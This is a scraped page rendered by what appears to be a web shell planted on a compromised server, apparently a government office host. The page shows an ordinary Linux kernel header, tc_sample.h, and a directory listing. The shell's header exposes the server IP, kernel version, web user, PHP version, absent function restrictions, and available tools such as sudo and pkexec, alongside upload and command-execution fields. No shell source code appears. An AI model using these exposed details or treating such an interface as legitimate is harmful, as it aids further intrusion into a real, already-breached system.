p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/modules/3.10.0-1160.119.1.el7.x86_64/build/include/net/tc_act/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /usr/lib/modules/3.10.0-1160.119.1.el7.x86_64/build/include/net/tc_act/tc_sample.h
#ifndef __NET_TC_SAMPLE_H
#define __NET_TC_SAMPLE_H

#include <net/act_api.h>
#include <linux/tc_act/tc_sample.h>
#include <net/psample.h>

struct tcf_sample {
	struct tc_action common;
	u32 rate;
	bool truncate;
	u32 trunc_size;
	struct psample_group __rcu *psample_group;
	u32 psample_group_num;
	struct list_head tcfm_list;
};
#define to_sample(a) ((struct tcf_sample *)a)

static inline bool is_tcf_sample(const struct tc_action *a)
{
#ifdef CONFIG_NET_CLS_ACT
	return a->ops && a->ops->type == TCA_ACT_SAMPLE;
#else
	return false;
#endif
}

static inline __u32 tcf_sample_rate(const struct tc_action *a)
{
	return to_sample(a)->rate;
}

static inline bool tcf_sample_truncate(const struct tc_action *a)
{
	return to_sample(a)->truncate;
}

static inline int tcf_sample_trunc_size(const struct tc_action *a)
{
	return to_sample(a)->trunc_size;
}

static inline struct psample_group *
tcf_sample_psample_group(const struct tc_action *a)
{
	return rcu_dereference(to_sample(a)->psample_group);
}

#endif /* __NET_TC_SAMPLE_H */
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
September 29 2025 07:01:24
0 / 0
0755
tc_connmark.h
0.252 KB
November 06 2023 09:15:52
0 / 0
0644
tc_csum.h
0.545 KB
November 06 2023 09:15:52
0 / 0
0644
tc_defact.h
0.233 KB
November 06 2023 09:15:52
0 / 0
0644
tc_gact.h
1.29 KB
November 06 2023 09:15:52
0 / 0
0644
tc_ife.h
1.99 KB
November 06 2023 09:15:52
0 / 0
0644
tc_ipt.h
0.278 KB
November 06 2023 09:15:52
0 / 0
0644
tc_mirred.h
0.922 KB
November 06 2023 09:15:52
0 / 0
0644
tc_nat.h
0.274 KB
November 06 2023 09:15:52
0 / 0
0644
tc_pedit.h
1.418 KB
November 06 2023 09:15:52
0 / 0
0644
tc_sample.h
1.006 KB
November 06 2023 09:15:52
0 / 0
0644
tc_skbedit.h
1.357 KB
November 06 2023 09:15:52
0 / 0
0644
tc_skbmod.h
0.747 KB
November 06 2023 09:15:52
0 / 0
0644
tc_tunnel_key.h
1.801 KB
November 06 2023 09:15:52
0 / 0
0644
tc_vlan.h
1.241 KB
November 06 2023 09:15:52
0 / 0
0644